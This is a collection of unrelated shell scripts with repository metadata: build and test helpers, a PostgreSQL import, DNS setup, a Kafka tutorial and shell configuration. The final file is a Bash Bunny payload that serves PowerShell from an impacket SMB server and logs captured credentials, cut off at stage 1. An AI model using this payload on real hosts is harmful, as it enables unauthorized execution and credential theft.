set +u
| true |
14efe06dc6a4d306dc6631433d7985ad252f827d
|
Shell
|
gergelyfabian/rules_scala
|
/scala/scalafmt/private/format-test.template.sh
|
UTF-8
| 1,070 | 3.53125 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
# Scalafmt check template: compare each source file against its formatted
# counterpart from the build; print a diff for every mismatch and exit
# non-zero if any file needs reformatting. %workspace% and %manifest% are
# substituted by the rule before this script runs.
# Explanation: IF $BUILD_WORKSPACE_DIRECTORY is set to something (as it would be during a
# `bazel run`), then append a trailing `/`. If it's not set (as it wouldn't be during
# a `bazel test` invocation in a wrapping `sh_test` rule), then elide the trailing `/`, and
# instead rely upon a relative path from the test's runtrees. The corresponding change
# to `phase_scalafmt` places the source files into the `runfiles` set, so they'll be symlinked
# correctly in the appropriate relative location.
WORKSPACE_ROOT="${1:-${BUILD_WORKSPACE_DIRECTORY}${BUILD_WORKSPACE_DIRECTORY:+/}}"
# TEST_SRCDIR is set under `bazel test`; otherwise fall back to $0.runfiles.
RUNPATH="${TEST_SRCDIR-$0.runfiles}"/%workspace%
# Deliberate unquoted expansion: replace "bin" with a space and let
# word-splitting cut the path, keeping the prefix up to bazel's bin dir.
# NOTE(review): assumes the runfiles path itself contains no spaces — confirm.
RUNPATH=(${RUNPATH//bin/ })
RUNPATH="${RUNPATH[0]}"bin
EXIT=0
# Manifest lines are "<original> <formatted>" path pairs.
while read original formatted; do
if [[ ! -z "$original" ]] && [[ ! -z "$formatted" ]]; then
if ! cmp -s "${WORKSPACE_ROOT}$original" "$RUNPATH/$formatted"; then
echo $original
diff "${WORKSPACE_ROOT}$original" "$RUNPATH/$formatted" || true
EXIT=1
fi
fi
done < "$RUNPATH"/%manifest%
exit $EXIT
| true |
5af35788cc81ad6d62e55d20ae81d1239fe3bb69
|
Shell
|
akrito/Varnish-Least-Busy-Director
|
/varnish-cache/bin/varnishd/vclflint.sh
|
UTF-8
| 228 | 3.109375 | 3 |
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
#
# Run flexelint on the VCL output.
# No argument: lint the built-in VCL for "-b localhost".
# One argument: lint the compiled form of that VCL file.
if [ "x$1" = "x" ] ; then
	./varnishd -C -b localhost > /tmp/_.c
elif [ -f "$1" ] ; then
	./varnishd -C -f "$1" > /tmp/_.c
else
	echo "usage!" 1>&2
	# Original fell through here and linted a stale /tmp/_.c.
	exit 1
fi
flexelint vclflint.lnt /tmp/_.c
| true |
45881c5667514ee6773e444d14ec9c7c07ad59e4
|
Shell
|
TheWover/PoshC2
|
/Files/posh-service
|
UTF-8
| 549 | 3.59375 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Enable and (re)start the PoshC2 service, wait for its log file to appear,
# then follow the log with posh-log.
# trap ctrl-c and call ctrl_c()
trap ctrl_c INT
# Restore the original directory and quit when the user interrupts the log view.
function ctrl_c() {
        popd > /dev/null
        exit
}

# Allow an alternative install location via the POSHC2_DIR environment variable.
if [[ -z "${POSHC2_DIR}" ]]; then
  POSH_DIR="/opt/PoshC2"
else
  POSH_DIR="${POSHC2_DIR}"
fi

# Test pushd directly instead of inspecting $? afterwards; quote the path.
if pushd "$POSH_DIR" > /dev/null; then
  systemctl enable poshc2.service >/dev/null
  systemctl restart poshc2.service >/dev/null
  # Wait up to ~10s for the server log to exist before tailing it.
  x=0   # was uninitialized; [[ $x -le 10 ]] only worked because bash treats "" as 0
  while [[ $x -le 10 ]]; do
    if [ -f "/var/log/poshc2_server.log" ]; then
      break
    fi
    sleep 1s
    x=$(( x + 1 ))
  done
  /usr/bin/posh-log
  popd > /dev/null
fi
| true |
f82bb92f0697933cbcf9bc565ecb4822f919291b
|
Shell
|
oleklapp/mcash-magento
|
/test.sh
|
UTF-8
| 261 | 2.828125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
# Lint all PHP sources, then run each *test.php file through phpunit.
set -e
set -o xtrace # Echo out the command before running it

# php -l exits non-zero on a syntax error, aborting via set -e.
find . -name "*.php" -not -path "./vendor/*" | xargs -n 1 php -l

php --version

# Iterate test files via a while-read loop instead of word-splitting a
# backtick substitution, so paths containing spaces are handled; a failing
# phpunit still aborts the pipeline under set -e.
find . -name "*test.php" -not -path "./vendor/*" |
while read -r f
do
	phpunit --verbose "$f"
done
| true |
252dd685a8648bb43b56b28b414f91d4dcdca9c2
|
Shell
|
jkjuopperi/nist-hash-check
|
/make-psql-db.sh
|
UTF-8
| 1,779 | 2.96875 | 3 |
[] |
no_license
|
#!/bin/sh
# Build a PostgreSQL database from NIST NSRL dump files: emit DDL plus COPY
# streams (sanitized through iconv) and pipe the whole script into psql.
# Any arguments to this script are forwarded to psql (connection options etc.).
generate () {
cat <<-EOF
	BEGIN;
	CREATE TABLE IF NOT EXISTS mfg (MfgCode integer PRIMARY KEY NOT NULL, MfgName text NOT NULL);
	CREATE TABLE IF NOT EXISTS os (
	OpSystemCode integer PRIMARY KEY NOT NULL,
	OpSystemName text NOT NULL,
	OpSystemVersion text,
	MfgCode integer REFERENCES mfg (MfgCode)
	);
	CREATE TABLE IF NOT EXISTS prod (
	ProductCode integer NOT NULL,
	ProductName text NOT NULL,
	ProductVersion text,
	OpSystemCode integer REFERENCES os (OpSystemCode),
	MfgCode integer REFERENCES mfg (MfgCode),
	Language text,
	ApplicationType text
	);
	CREATE TABLE IF NOT EXISTS file (
	"SHA-1" text,
	"MD5" text,
	"CRC32" text,
	FileName text NOT NULL,
	FileSize bigint,
	ProductCode integer,
	OpSystemCode integer REFERENCES os (OpSystemCode),
	SpecialCode text
	);
	EOF
# Each COPY … FROM STDIN block is followed by the (re-encoded) CSV data and
# terminated by the \. end-of-data marker psql expects.
cat <<-EOF
	COPY mfg FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
	EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlmfg.txt
echo '\.'
cat <<-EOF
	COPY os FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
	EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlos.txt
echo '\.'
cat <<-EOF
	COPY prod FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
	EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlprod.txt
echo '\.'
cat <<-EOF
	COPY file FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"' );
	EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlfile.txt
echo '\.'
cat <<-EOF
	CREATE INDEX file_sha1_idx ON file ("SHA-1");
	COMMIT;
	EOF
}
# "$@" (quoted) preserves each psql argument as one word; the original
# unquoted $@ would split arguments containing spaces.
generate | psql "$@"
| true |
6bae44a869ee2534a127027d5f48a36725106553
|
Shell
|
Michael-Santos/rip
|
/configura.sh
|
UTF-8
| 665 | 3.328125 | 3 |
[] |
no_license
|
# Create the required alias interfaces on the device given as $1.
if [ "$#" -ne 1 ]; then
    echo "Uso: \$configura < interface >"
    exit 1    # usage error: signal failure instead of exiting 0
fi

# Address assigned to each alias interface.
ENDERECOS[0]='192.168.1.100'
ENDERECOS[1]='192.168.2.100'
ENDERECOS[2]='192.168.3.100'
ENDERECOS[3]='192.168.1.200'
ENDERECOS[4]='192.168.5.100'
ENDERECOS[5]='192.168.3.200'
ENDERECOS[6]='192.168.4.100'
ENDERECOS[7]='192.168.5.200'
ENDERECOS[8]='192.168.2.200'
ENDERECOS[9]='192.168.4.200'

# Automatic way to obtain interfaces (doesn't always work)
# INTERFACES=$(ip link show | cut -d " " -f 2 | cut -d ":" -f 1 | cut -d$'\n' -f 3 )

# Bring up one alias per address: <iface>:0 … <iface>:9 (quoted expansions).
for i in "${!ENDERECOS[@]}"; do
    sudo ifconfig "$1:$i" "${ENDERECOS[$i]}"
done
| true |
e8b8191276920c79de2fe39c1d9c76f976083701
|
Shell
|
oke11o/gqlgen-sqlc-example
|
/scripts/pg_healthcheck.sh
|
UTF-8
| 183 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/sh
# Docker healthcheck: succeed only if a trivial SELECT round-trips through
# psql. Quoting ${select} is essential — unquoted, an empty psql result made
# the test expand to `[ = '1' ]`, a syntax error.
if select=$(echo 'SELECT 1' | psql --username "${POSTGRES_USER}" --dbname "${POSTGRES_DB}" --quiet --no-align --tuples-only) && [ "${select}" = '1' ]
then
	exit 0
fi
exit 1
| true |
3e159568b4312cbbbb36ebc80e3d05acd0bba680
|
Shell
|
waxcage/7-hour-quest
|
/no.sh
|
UTF-8
| 74 | 2.515625 | 3 |
[] |
no_license
|
#!/bin/bash
# Print "n" ten times (e.g. to answer a fixed series of yes/no prompts).
COUNTER=0
while [ "$COUNTER" -lt 10 ]; do
  echo "n"
  COUNTER=$((COUNTER + 1))  # was missing: the loop never terminated
done
| true |
037dd6854910a6fa2e090e2c036f47f2b84fffcc
|
Shell
|
krishnachaitanyareddy/director-scripts
|
/azure-dns-scripts/bootstrap_dns_nm.sh
|
UTF-8
| 1,573 | 3.890625 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# RHEL 7.2 uses NetworkManager. Add a script to be automatically invoked when interface comes up.
# The heredoc is quoted ("EOF") so the dispatcher script is written verbatim.
# Fix vs. original: `[ "$1" != "eth0" || "$2" != "up" ]` is invalid — `||` is
# a shell operator, not a test operator — so the nic/action guard always
# errored; split into two [ ] tests joined by ||.
cat > /etc/NetworkManager/dispatcher.d/12-register-dns <<"EOF"
#!/bin/bash
# NetworkManager Dispatch script
# Deployed by Cloudera Director Bootstrap
#
# Expected arguments:
# $1 - interface
# $2 - action
#
# See for info: http://linux.die.net/man/8/networkmanager
# Register A and PTR records when interface comes up
# only execute on the primary nic
if [ "$1" != "eth0" ] || [ "$2" != "up" ]
then
exit 0;
fi
# when we have a new IP, perform nsupdate
new_ip_address="$DHCP4_IP_ADDRESS"
host=$(hostname -s)
domain=$(hostname | cut -d'.' -f2- -s)
domain=${domain:='cdh-cluster.internal'} # REPLACE-ME If no hostname is provided, use cdh-cluster.internal
IFS='.' read -ra ipparts <<< "$new_ip_address"
ptrrec="$(printf %s "$new_ip_address." | tac -s.)in-addr.arpa"
nsupdatecmds=$(mktemp -t nsupdate.XXXXXXXXXX)
resolvconfupdate=$(mktemp -t resolvconfupdate.XXXXXXXXXX)
echo updating resolv.conf
grep -iv "search" /etc/resolv.conf > "$resolvconfupdate"
echo "search $domain" >> "$resolvconfupdate"
cat "$resolvconfupdate" > /etc/resolv.conf
echo "Attempting to register $host.$domain and $ptrrec"
{
echo "update delete $host.$domain a"
echo "update add $host.$domain 600 a $new_ip_address"
echo "send"
echo "update delete $ptrrec ptr"
echo "update add $ptrrec 600 ptr $host.$domain"
echo "send"
} > "$nsupdatecmds"
nsupdate "$nsupdatecmds"
exit 0;
EOF
chmod 755 /etc/NetworkManager/dispatcher.d/12-register-dns
service network restart
| true |
7f1e6bd32c3eea260f8495fdcb13271c9d9320b4
|
Shell
|
alvls/parprog-2018-1
|
/groups/1506-3/lipatov_id/run.sh
|
UTF-8
| 325 | 2.84375 | 3 |
[] |
no_license
|
#!/bin/bash
# Run the benchmark binary on every test input and compare the sequential
# output against the OpenMP and TBB outputs.
for file in ./Tests/*; do
    # Skip answer files and outputs from earlier runs; process only inputs.
    if [[ "$file" != *perfect.ans ]] &&
       [[ "$file" != *.seq ]] &&
       [[ "$file" != *.omp ]] &&
       [[ "$file" != *.tbb ]];
    then
        # Quoted expansions: filenames with spaces no longer word-split.
        ./Test/b 4 "$file" "$file.seq" "$file.omp" "$file.tbb"
        diff "$file.seq" "$file.omp"
        diff "$file.seq" "$file.tbb"
    fi
done
| true |
724aad9d084fbb113ec5ba7d85e1150f36bcd795
|
Shell
|
hqjang-pepper/Linux-study
|
/test_integer.sh
|
UTF-8
| 255 | 3.328125 | 3 |
[] |
no_license
|
#!/bin/bash
#test_integer: evaluate the value of integer
INT=-5
# Match digits only, with an optional leading minus sign.
if [[ "$INT" =~ ^-?[0-9]+$ ]]; then
    echo "it is integer."
else
    # Original lacked 'echo': the message string itself was executed as a
    # command (exit 127). Print it to stderr and fail explicitly instead.
    echo "INT is not an integer." >&2
    exit 1
fi
| true |
56ffb0ddb7af529988eed710a2457e1844a416c3
|
Shell
|
Boffmann/ETCSOnBoard
|
/setup_revPi.sh
|
UTF-8
| 1,308 | 2.859375 | 3 |
[] |
no_license
|
# Install OpenSplice DDS on a RevPi: build from source, register the runtime
# environment in ~/.bashrc, and point the DDS network config at eth0's address.
sudo su
apt update
echo "Installing OpenSplice dependencies..."
sleep 3
apt install -y flex bison perl gawk cmake vim
echo "Downloading OpenSplice Source code..."
sleep 3
wget https://github.com/ADLINK-IST/opensplice/archive/OSPL_V6_9_190925OSS_RELEASE.zip
echo "Unzipping OpenSplice Sourcecode..."
sleep 3
unzip OSPL_V6_9_190925OSS_RELEASE.zip -d ospl
echo "Compiling OpenSplice..."
sleep 3
cd ospl/OSPL_V6_9_190925OSS_RELEASE
# Bug fix: 'source ./configure & make' backgrounded configure and raced it
# against make; configure must complete before the build starts.
source ./configure && make
echo "Installing OpenSplice..."
make install
source /home/ospl/OSPL_V6_9_190925OSS_RELEASE/install/HDE/armv7l.linux-dev/release.com
echo "source /home/ospl/OSPL_V6_9_190925OSS_RELEASE/install/HDE/armv7l.linux-dev/release.com" >> /home/pi/.bashrc
# Extract eth0's IPv4 address (strip the /prefix from 'ip addr' output).
ip_addr=$(ip addr show eth0 | awk '$1 == "inet" {gsub(/\/.*$/, "", $2); print $2}')
# Bug fix: without -i sed only printed the edited file to stdout; edit
# ospl.xml in place.
sed -i "s/<NetworkInterfaceAddress>.*<\/NetworkInterfaceAddress>/<NetworkInterfaceAddress>$ip_addr<\/NetworkInterfaceAddress>/" $OSPL_HOME/etc/config/ospl.xml
# Re-apply the address substitution on every boot: drop rc.local's trailing
# 'exit 0', append the update commands, then restore 'exit 0'.
sed -i '$ d' /etc/rc.local
echo "ip_addr=\$(ip addr show eth0 | awk '\$1 == \"inet\" {gsub(/\/.*$/, \"\", \$2); print \$2}')" >> /etc/rc.local
echo "sed -i \"s/<NetworkInterfaceAddress>.*<\\/NetworkInterfaceAddress>/<NetworkInterfaceAddress>\$ip_addr<\\/NetworkInterfaceAddress>/\" \$OSPL_HOME/etc/config/ospl.xml" >> /etc/rc.local
echo "exit 0" >> /etc/rc.local
| true |
600e8537b19edc7ee10903f1d602369a5770bdcd
|
Shell
|
SergiOn/java
|
/Courses/Apache-Kafka-Series-Kafka-Connect-Hands-on-Learning/kafka-connect-code_v3.3.0/kafka-connect-tutorial-sources.sh
|
UTF-8
| 3,516 | 3.125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# NOTE: this file is a step-by-step tutorial transcript. Run the commands
# interactively (several of them open new shells or block), and replace
# placeholders such as <containerId>; do not execute the file end-to-end.
# Make sure you change the ADV_HOST variable in docker-compose.yml
# if you are using docker Toolbox
# 1) Source connectors
# Start our kafka cluster
docker-compose up kafka-cluster
# Wait 2 minutes for the kafka cluster to be started
###############
# A) FileStreamSourceConnector in standalone mode
# Look at the source/demo-1/worker.properties file and edit bootstrap
# Look at the source/demo-1/file-stream-demo.properties file
# Look at the demo-file.txt file
# We start a hosted tools, mapped on our code
# Linux / Mac
docker run --rm -it -v "$(pwd)":/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# Windows Command Line:
docker run --rm -it -v %cd%:/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# Windows Powershell:
docker run --rm -it -v ${PWD}:/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# we launch the kafka connector in standalone mode:
cd /tutorial/source/demo-1
# create the topic we write to with 3 partitions
kafka-topics --create --topic demo-1-standalone --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# Usage is connect-standalone worker.properties connector1.properties [connector2.properties connector3.properties]
connect-standalone worker.properties file-stream-demo-standalone.properties
# write some data to the demo-file.txt !
# shut down the terminal when you're done.
###############
###############
# B) FileStreamSourceConnector in distributed mode:
# create the topic we're going to write to
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-topics --create --topic demo-2-distributed --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# you can now close the new shell
# head over to 127.0.0.1:3030 -> Connect UI
# Create a new connector -> File Source
# Paste the configuration at source/demo-2/file-stream-demo-distributed.properties
# Now that the configuration is launched, we need to create the file demo-file.txt
docker ps
docker exec -it <containerId> bash
touch demo-file.txt
echo "hi" >> demo-file.txt
echo "hello" >> demo-file.txt
echo "from the other side" >> demo-file.txt
# Read the topic data
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-console-consumer --topic demo-2-distributed --from-beginning --bootstrap-server 127.0.0.1:9092
# observe we now have json as an output, even though the input was text!
###############
###############
# C) TwitterSourceConnector in distributed mode:
# create the topic we're going to write to
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-topics --create --topic demo-3-twitter --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# Start a console consumer on that topic
kafka-console-consumer --topic demo-3-twitter --bootstrap-server 127.0.0.1:9092
# Follow the instructions at: https://github.com/Eneco/kafka-connect-twitter#creating-a-twitter-application
# To obtain the required keys, visit https://apps.twitter.com/ and Create a New App. Fill in an application name & description & web site and accept the developer aggreement. Click on Create my access token and populate a file twitter-source.properties with consumer key & secret and the access token & token secret using the example file to begin with.
# Setup instructions for the connector are at: https://github.com/Eneco/kafka-connect-twitter#setup
# fill in the required information at demo-3/source-twitter-distributed.properties
# Launch the connector and start seeing the data flowing in!
| true |
e2874d52bdfeb1d608921dfbad9acdc3bfe3cb11
|
Shell
|
ssdemajia/CCC
|
/shell/simple_vm.sh
|
UTF-8
| 703 | 3.984375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Populate the current directory (used as a chroot) with the shared
# libraries required by the program given as $1, then run it via chroot.
# Contact: 2chashao@gmail.com
# History:
# 2019.10.19 chashao first release
# Run $1 inside a chroot rooted at the current working directory.
function run() {
pwd=`pwd`;
sudo chroot ${pwd} ${1};
}
# Exactly one argument: the file to run inside the chroot.
[ "$#" -ne 1 ] && echo "脚本必须有一个参数file,指定运行的文件" && exit 0;
# Bug fix: resolve the libraries of the program passed in $1, not a
# hard-coded ./a.out. Keep only absolute library paths from ldd output.
ldd=$(for i in `ldd "$1"`;do echo $i;done | grep -v = | grep -v '(' | grep / )
# If a lib directory already exists, bail out rather than clobber it.
if [ -d lib ]; then
echo "such directory has exist"
exit 1;
fi
for i in ${ldd}
do
# ${i%/*} removes the last path component (shortest match from the right).
currentdir=${i:1}
mkdir -p ${currentdir%/*}
cp ${i} ${currentdir}
done
run $@;
exit $?;
| true |
076e702ec1f5072f862d1c050193f564ab3821f4
|
Shell
|
YenForYang/debian-discount
|
/discount/librarian.sh
|
UTF-8
| 1,015 | 3.046875 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#! /bin/sh
#
# Build ELF shared libraries, hiding (some) ickiness from the makefile
# Usage: librarian.sh ACTION LIBRARY VERSION [objects... | destdir]
ACTION=$1; shift
LIBRARY=$1; shift
# Split the MAJOR.MINOR.PATCH version argument into MAJOR and VERSION.
eval `awk -F. '{ printf "MAJOR=%d\n", $1;
printf "VERSION=%d.%d.%d\n", $1, $2, $3; }' $1`
shift
LIBNAME=$LIBRARY.so
FULLNAME=$LIBNAME.$VERSION
case "$ACTION" in
make) FLAGS="-g -O2 -fdebug-prefix-map=/dev/shm/systemd/test/deps/test/lvm2/tmp/corosync/tmp/libqb/libsubunit-dev/others/libmarkdown2/discount=. -Wformat -march=native -pipe -fstack-security-check -Wformat-security -fPIC -shared"
unset VFLAGS
# NOTE(review): 'test "T"' is always true, so the -soname flag is
# unconditionally added; this looks like a placeholder condition — confirm.
test "T" && VFLAGS="-Wl,-soname,$LIBNAME.$MAJOR"
rm -f $LIBRARY $LIBNAME $LIBNAME.$MAJOR
# Link the versioned library, then create the conventional symlink chain.
if ccache icc $FLAGS $VFLAGS -o $FULLNAME "$@"; then
/bin/ln -s $FULLNAME $LIBRARY
/bin/ln -s $FULLNAME $LIBNAME
/bin/ln -s $FULLNAME $LIBNAME.$MAJOR
fi
;;
files) echo "$FULLNAME" "$LIBNAME" "$LIBNAME.$MAJOR"
;;
install)/usr/bin/install -c $FULLNAME "$1"
/bin/ln -s -f $FULLNAME $1/$LIBNAME.$MAJOR
/bin/ln -s -f $FULLNAME $1/$LIBNAME
/sbin/ldconfig "$1"
;;
esac
| true |
8a9bbecdff75c0b2f803e1567d8069e895b79736
|
Shell
|
SamPedley/dotfiles
|
/.aliases
|
UTF-8
| 2,939 | 3.296875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# Shell aliases: navigation, shortcuts, colorized ls/grep, and macOS helpers.
# Easier navigation: .., ..., ...., ....., ~ and -
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
# '--' ends option parsing so '-' itself can be used as an alias name.
alias -- -="cd -"
alias cdp="cd ~/Projects"
alias cdgo="cd $GOPATH"
# GR shortcuts
alias cdts="cd ~/Projects/TransferSafe/"
# Shortcuts
alias e="emacs"
alias v="vim"
alias g="git"
alias nr="npm run"
alias gb="go build"
# kubectl
alias ku="kubectl"
# Bug fix: "kubectrl" was a typo — the alias pointed at a nonexistent command.
alias kug="kubectl get"
alias kucontext="kubectl config current-context"
# docker
alias doc="docker"
alias hosts="sudo vim /etc/hosts"
# Detect which `ls` flavor is in use
if ls --color > /dev/null 2>&1; then # GNU `ls`
colorflag="--color"
export LS_COLORS='no=00:fi=00:di=01;31:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:'
else # macOS `ls`
colorflag="-G"
export LSCOLORS='BxBxhxDxfxhxhxhxhxcxcx'
fi
# List all files colorized in long format
alias l="ls -lF ${colorflag}"
# List all files colorized in long format, including dot files
alias la="ls -laF ${colorflag}"
# List only directories
alias lsd="ls -lF ${colorflag} | grep --color=never '^d'"
# Always use color output for `ls`
alias ls="command ls ${colorflag}"
# Always enable colored `grep` output
# Note: `GREP_OPTIONS="--color=auto"` is deprecated, hence the alias usage.
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
# Enable aliases to be sudo’ed (trailing space makes the shell expand the
# next word as an alias too)
alias sudo='sudo '
# IP addresses
alias ip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="ipconfig getifaddr en0"
# Trim new lines and copy to clipboard
alias c="tr -d '\n' | pbcopy"
# Show/hide hidden files in Finder
alias show="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hide="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
# URL-encode strings
alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1]);"'
# Intuitive map function
# For example, to list all directories that contain a certain file:
# find . -name .gitattributes | map dirname
alias map="xargs -n1"
# Lock the screen (when going AFK)
alias afk="/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
# Reload the shell (i.e. invoke as a login shell)
alias reload="exec ${SHELL} -l"
# Print each PATH entry on a separate line
alias path='echo -e ${PATH//:/\\n}'
| true |
9a271b70dfe55c209e144191a8acc25101066531
|
Shell
|
reotyan/dot_files
|
/.shadow/ubuntu/prompt.sh
|
UTF-8
| 1,319 | 3.3125 | 3 |
[] |
no_license
|
#!/bin/sh
# Prompt setup: reset terminal attributes before each command, draw the
# working directory and a clock anchored to the right edge of the terminal,
# and provide helpers for inspecting terminal colors.
# NOTE(review): PROMPT_COMMAND/PS1 and {30..37} ranges are bash features
# despite the #!/bin/sh shebang — confirm this is only sourced from bash.
trap 'printf "\e[0m"' DEBUG
# NOTE(review): "Tokyo" is not a valid zone name; "Asia/Tokyo" (used below)
# probably was intended — confirm.
export TZ=Tokyo
pc=$?
wd=$(pwd | wc -m) # Working Directory
pd=$(pwd | wc -m) # Past Directory
# Before each prompt: save the cursor, print pwd and date/time at the top
# right (padding over the previous, possibly longer path), then restore.
PROMPT_COMMAND='pc=$?; wd=$(pwd | wc -m); printf "\e[s\e[1;$(expr $COLUMNS - ${pd} + 1)f$(for n in $(seq 1 ${pd});do printf " ";done)\e[${wd}D\e[1m$(pwd)\e[0m\n\e[$(expr $COLUMNS - 11)C$(LANG=en_US.UTF-8 date +"%a %b %d")\n\e[$(expr $COLUMNS - 6)C$(TZ="Asia/Tokyo" date +"%H:%M")\e[u"; pd=$(pwd | wc -m)'
# Prompt: exit status, shell depth, green ;) on success / red :( on failure.
PS1='\[\e[0m\]$pc $SHLVL $(if [ $pc -eq 0 ]; then echo "\[\e[0;32m\];)"; else echo "\[\e[0;31m\]:("; fi) \[\e[38;5;248m\]\W \[\e[0;34m\]\$ \[\e[38;5;248m\]'
# Print a table of the 16 basic foreground/background color combinations.
colors() {
local fgc bgc vals seq0
printf "Color escapes are %s\n" '\e[${value};...;${value}m'
printf "Values 30..37 are \e[33mforeground colors\e[m\n"
printf "Values 40..47 are \e[43mbackground colors\e[m\n"
printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n"
# foreground colors
for fgc in {30..37}; do
# background colors
for bgc in {40..47}; do
fgc=${fgc#37} # white
bgc=${bgc#40} # black
vals="${fgc:+$fgc;}${bgc}"
vals=${vals%%;}
seq0="${vals:+\e[${vals}m}"
printf " %-9s" "${seq0:-(default)}"
printf " ${seq0}TEXT\e[m"
printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m"
done
echo; echo
done
}
# Show the 256-color palette via an external helper program.
colors256() {
~/Programs/256colors
}
| true |
2a76ca1471b8e675a2d773124e7081fba5cc9f29
|
Shell
|
lihentian/nerv
|
/resources/scripts/nerv/cluster/Host/create.sh
|
UTF-8
| 158 | 3.171875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Ensure the working directory named by $root exists, defaulting to "nerv".
# Create $root (and parents) if it does not already exist.
function create() {
if [ ! -d $root ]; then
mkdir -p $root
fi
}
if [ "$root" == "" ]; then
# Bug fix: '$root=nerv' is not an assignment — it expands to a command
# ('=nerv') and leaves root empty. Assign without the leading '$'.
root=nerv
fi
create
| true |
87032317b5be12bf90298220ad0672045d5521ee
|
Shell
|
hak5/bashbunny-payloads
|
/payloads/library/execution/psh_DownloadExecSMB/payload.txt
|
UTF-8
| 2,495 | 3.765625 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Title: Powershell Download and Execute SMB
# Author: LowValueTarget
# Version: 2.0
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.2
#
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
# Captured credentials are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
#
# | Attack Stage        | Description                   |
# | ------------------- | ------------------------------|
# | Stage 1             | Powershell                    |
# | Stage 2             | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
# SETUP
LED SETUP
REQUIRETOOL impacket # required for SMB server
GET SWITCH_POSITION
GET TARGET_HOSTNAME
GET HOST_IP
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
mkdir -p /tmp/{l,p}
# CHECK FOR POWERSHELL PAYLOAD
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
# GET HOSTNAME
HOST=${TARGET_HOSTNAME}
[[ -z "${HOST}" ]] && HOST="noname"
# Number loot directories per host: count existing ones and add one.
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
COUNT=$((COUNT+1))
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
# START SMB SERVER
LOGFILE=/tmp/l/psh_downloadsmb.log
touch ${LOGFILE}
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
# STAGE 1 - POWERSHELL
LED STAGE1
